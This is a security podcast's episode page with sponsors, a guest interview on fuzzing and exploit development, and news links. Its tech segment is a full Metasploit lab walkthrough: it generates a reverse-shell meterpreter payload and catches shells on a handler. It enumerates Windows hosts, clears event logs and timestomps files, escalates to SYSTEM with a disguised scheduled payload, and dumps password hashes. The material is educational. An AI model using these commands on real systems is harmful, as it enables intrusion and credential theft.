Episode153

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Announcements & Shameless Plugs

Security Weekly - Episode 153 - May 21, 2009

  • Episode 150 Audio has been posted for the entire out-of-this-world shindig! It is available in sections here
  • 2009 South Florida ISSA Conference and Exhibition - June 24th Learn more!
  • SANS Security Europe: SEC 504 in Amsterdam with Larry. May 18th-23rd
  • SANS Pentest Summit! Vegas Baby! Paul, Larry, John presenting. June 1st - 2nd
  • For every 100 tees sold, we will pour beer into a laptop! Tee shirt store
  • DEFCON! The Poetry Jam is back with more even more snark!

Episode Media

mp3 pt 1

mp3 pt 2

Special Guest: Stephen Sims

Stephen is an Information Security Consultant working for Wells Fargo in San Francisco, CA. He has spent the past eight years in San Francisco working on Network and Systems Security, Penetration Testing, Exploitation Development, Risk Assessment and Management. He is one of only a handful of individuals who holds the GIAC Security Expert (GSE) Certification, and also helps to author and maintain the current version of the exam. He is a SANS Certified Instructor and the course author of SANS’ first and only 700-level course, SEC709, “Developing Exploits for Penetration Testers and Security Resaerchers.” Stephen also holds the CISSP, CISA and Network Offense Professional (NOP) certification, amongst others.

In SANS' SEC709 course, he has been turning students into exploit developers, using hands-on labs to reinforce focused training materials. The fuzzing material also gives students training on the tools and techniques for software fault testing using canned and custom fuzzing tools. A quick sampling of topics includes:

  • Why fuzzing is needed for security, and how it can be used by Quality Assurance teams, software developers, vendors and penetration testers.
  • Building an attack plan, sources for data collection, testing and monitoring techniques and tools
  • Fuzzing techniques including static test case development, randomized fuzzing, mutation and intelligent mutation fuzzing
  • Fuzzing opportunities and common software developer mistakes to target
  • Effective fuzzing through code coverage analysis using available source or closed binaries

In the labs, he uses a variety of tools including Taof, Gcov/Lcov, Paimei with Pstalker, IDA Pro with the idapython plugin, the Sulley fuzzing framework and a bunch more.

Steve is teaching his Developing Exploits for Penetration Testers and Security Researchers course in several upcoming conferences:


Questions:

  • What is 'fuzzing' and does it involve beer?
  • Why is fuzzing necessary to test security?
  • What can we exect of a SANS "700" level course?
  • Are there significant security differences between how Apple and Windows implement Address Space Layout Randomization (ASLR)?
  • Why does your course focus on Linux ASLR?
  • What kind of incidents does the class prepare the students for?
  • What's your favorite tool covered in the lab?
  • Which OS is your primary OS?
  • Any thoughts on Snow Leopard or Windows 7 security changes?
  • Ninja or Pirate?

Tech Segment: Winenum meterpreter script Carlos "Dark0perator" Perez

Carlos will discuss his Windows enumeration (WinEnum) script. This script uses native Windows command line tools to gather information that can later be leveraged for further attacks. It also allows the ability to export and download the target's host registry as well as detects if the target machine is a Virtual Machine. His script is now part of the Metasploit Project.


For background purposes, vintage meterpreter intro by John Strand


Example session:

The main function of the Meterpreter Windows Enumeration script  


Generating a Meterpreter Payload Executable from the Metasploit Folder:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.184 X > meterpreter.exe

Setting msconsole to receive several shells:

    root@bt:/pentest/exploits/framework3# ./msfconsole

                    ##                          ###           ##    ##
     ##  ##  #### ###### ####  #####   #####    ##    ####        ######
    ####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
    ####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
    ## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
    ##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                          ##


           =[ msf v3.3-dev
    + -- --=[ 372 exploits - 234 payloads
    + -- --=[ 20 encoders - 7 nops
           =[ 150 aux

    msf > ./msfconsole
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.1.184
    LHOST => 192.168.1.184
    msf exploit(handler) > set ExitOnSession false
    ExitOnSession => false
    msf exploit(handler) > exploit -j
    [*] Exploit running as background job.
    msf exploit(handler) >


Receiving the shells

    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler...
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 1 opened (192.168.1.184:4444 -> 192.168.1.138:60255)
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 2 opened (192.168.1.184:4444 -> 192.168.1.138:55808)

    msf exploit(handler) > sessions -l

    Active sessions
    ===============

      Id  Description  Tunnel
      --  -----------  ------
      1   Meterpreter  192.168.1.184:4444 -> 192.168.1.138:60255
      2   Meterpreter  192.168.1.184:4444 -> 192.168.1.138:55808

Moving to first shell and running Winenum with the -h option to show the help message:

    msf exploit(handler) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > sysinfo
    Computer: AWINXP01
    OS      : Windows XP (Build 2600, Service Pack 2).
    meterpreter > run winenum -h
    Windows Local Enumerion Meterpreter Script
    Usage:

    -h      This help message.

    -m      Migrates the Meterpreter Session from it current process to a new one

    -c      Changes Access Time, Modified Time and Created Time of executables
            that where run on the target machine and clear the EventLog

    -r      Dumps, compresses and download entire Registry

Running Winenum:

    meterpreter > run winenum
    [*] Running Windows Local Enumerion Meterpreter Script
    [*] New session on 192.168.1.138:60255...
    [*] Saving report to /root/.msf3/logs/winenum/192.168.1.138_20090520.0247-06095/192.168.1.138_20090520.0247-06095.txt
    [*] Checking if AWINXP01 is a Virtual Machine ........
    [*] BIOS Check Failed
    [*]     This is a VMWare virtual Machine
    [*] Running Command List ...
    [*]     running command cmd.exe /c set
    [*]     running command arp -a
    [*]     running command ipconfig /all
    [*]     running command ipconfig /displaydns
    [*]     running command route print
    [*]     running command net view
    [*]     running command netstat -nao
    [*]     running command netstat -vb
    [*]     running command netstat -ns
    [*]     running command net accounts
    [*]     running command net accounts /domain
    [*]     running command net session
    [*]     running command net share
    [*]     running command net group
    [*]     running command net user
    [*]     running command net localgroup
    [*]     running command net localgroup administrators
    [*]     running command net group administrators
    [*]     running command net view /domain
    [*]     running command netsh firewall show config
    [*]     running command tasklist /svc
    [*]     running command tasklist /m
    [*]     running command gpresult /SCOPE COMPUTER /Z
    [*]     running command gpresult /SCOPE USER /Z
    [*] Running WMIC Commands ....
    [*]     running command wmic computersystem list brief
    [*]     running command wmic useraccount list
    [*]     running command wmic group list
    [*]     running command wmic service list brief
    [*]     running command wmic volume list brief
    [*]     running command wmic logicaldisk get description,filesystem,name,size
    [*]     running command wmic netlogin get name,lastlogon,badpasswordcount
    [*]     running command wmic netclient list brief
    [*]     running command wmic netuse get name,username,connectiontype,localname
    [*]     running command wmic share get name,path
    [*]     running command wmic nteventlog get path,filename,writeable
    [*]     running command wmic process list brief
    [*]     running command wmic startup list full
    [*]     running command wmic rdtoggle list
    [*]     running command wmic product get name,version
    [*]     running command wmic qfe
    [*] Extracting software list from registry
    [*] Finnished Extraction of software list from registry
    [*] Dumping and Downloading the Registry entries for Configured Wireless Networks
    [*]     Exporting HKLM\Software\Microsoft\WZCSVC\Parameters\Interfaces
    [*]     Compressing key into cab file for faster download
    [*]     Downloading wlan_20090520.0247-06095.cab to -> /root/.msf3/logs/winenum/192.168.1.138_20090520.0247-06095/wlan_20090520.0247-06095.cab
    [*]     Deleting left over files
    [*] Dumping password hashes...
    [*] Hashes Dumped
    [*] Getting Tokens...
    [*] All tokens have been processed
    [*] Done!
    meterpreter >

Showing how to escalate privileges in case a Windows Vista or Windows 2008 box does not let you dump the hashes:

    Background session 1? [y/N]

    msf exploit(handler) > sessions -i 2
    [*] Starting interaction with 2...

    meterpreter > sysinfo
    Computer: WIN2K8
    OS      : Windows 2008 (Build 6001, Service Pack 1).
    meterpreter > use priv
    Loading extension priv...success.
    meterpreter > getuid
    Server username: WIN2K8\Administrator
    meterpreter > hashdump
    [-] priv_passwd_get_sam_hashes: Operation failed: 87
    meterpreter > run scheduleme -h
    Scheduleme Meterpreter Script
    This script provides most common scheduling types used during a pentest.
    It has the functionality to upload a desired executable or script and schedule
    the file uploaded. All scheduled task are as System so Meterpreter process must
    be System or local admin for local schedules and Administrator for remore shcedules
            -h              Help menu.
            -c <opt>        Command to execute at the given time. If options for execution needed use double quotes
            -d              Daily.
            -hr <opt>       Every specified hours 1-23.
            -m <opt>        Every specified amount of minutes 1-1439
            -l              When a user logs on.
            -s              At system startup.
            -i              Run command imediatly and only once.
            -r              Remote Schedule. Executable has to be already on remote target
            -e <opt>        Executable or script to upload to target host, will not work with remote schedule
            -o <opt>        Options for executable when upload method used
            -u              Username of account with administrative privelages.
            -p              Password for account provided.
            -t <opt>        Remote system to schedule job.
    meterpreter > run scheduleme -e ./meterpreter.exe -i
    [*] Uploadingd ./meterpreter.exe....
    [*] ./meterpreter.exe uploaded!
    [*] Scheduling command C:\Users\ADMINI~1\AppData\Local\Temp\svhost43.exe to run now.....
    [*] The scheduled task has been successfully created
    [*] For cleanup run schtasks /delete /tn syscheck80 /F
    meterpreter >
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 3 opened (192.168.1.184:4444 -> 192.168.1.138:54783)

    Background session 2? [y/N]
    msf exploit(handler) > sessions -i 3
    [*] Starting interaction with 3...

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > sysinfo
    Computer: WIN2K8
    OS      : Windows 2008 (Build 6001, Service Pack 1).
    meterpreter > use priv
    Loading extension priv...success.
    meterpreter > hashdump
    admin:1000:aad3b435b51404eedad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
    Administrator:500:aad3b435b51104eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    meterpreter >     


Some other Darkoperator Meterpreter Scripts can be found here:

Three you want to use on every test:

Keylogger:
Memory Dump:
Sound recorder:

Stories For Discussion

  1. Getting Started In Information Security How-To! - [MikeP] A compilation of advice from our forum.
  2. Using Nessus In Web Application Testing - [Paul Asadoorian] - This was my presentation at a recent OWASP meeting.
  3. Google: We were incorrect when we said we were part of the problem - [MikeP] Google flags Google Analytics as aiding in distributing malware, then retracts. hmmm - I wonder if they got preferential treatment ?
  4. Firefox FTW! - [MikeP] - A local story about how FireFox catches a possible XSS vulnerability, and how IE, well, doesn't.
  5. Poisoning Google search results - [Mick] - related to the story above. It's only natural that attackers will attempt to leverage the trust folks place in Google. Here's a *brief* write-up about Gumblar. A truly multi-stage malware. The Great Mickini Seer of the Future predicts these attacks will be the new norm.
  6. SamuraiWTF 0.6 is out! - [Mick] - InGuardians released version 0.6 last Saturday. Get some!
  7. Apples and Java don't mix - [Mick] - Apple update 10.5.7 fixed lots of bugs, but it missed a fairly big one. Mac OS X folks, stay away from the Java for a while. (I'm going decaff)
  8. OpenSSH flaw - [Mick] - Full details are out, and it's not too good. No attacks yet, but get ready to patch.
  9. Tom Listons take on the Java attack vector - [strandjs] - Tom throws his two cents in on the Java attack vector. So far from what I have seen it is fairly complex to black box this attack vector.. However, from a crystal-box review we may have a better chance.
  10. Another write-up of the Java attack Mick mentioned above - [strandjs] - Nice explanation on how to verify your doPrivileged code. This might be a more interesting problem in the long run...
  11. Interesting JS Obfuscation attack in the wild - [strandjs] - Did they mention "legitimate site" and "Two Girls One Cup" in the same paragraph? Time to open up the Websense filters?
  12. Beer as a key ingredient for team development - [strandjs] - Must be a listener of the show... If not we need to get him on.
  13. Steve's Band - [strandjs] - Check out Solid State Logic.

Other Stories Of Interest

  1. Irony, thy sting is cruel - [PDC Crew] - Flak vests mandatory apparel at anti-violence rallies, apparently.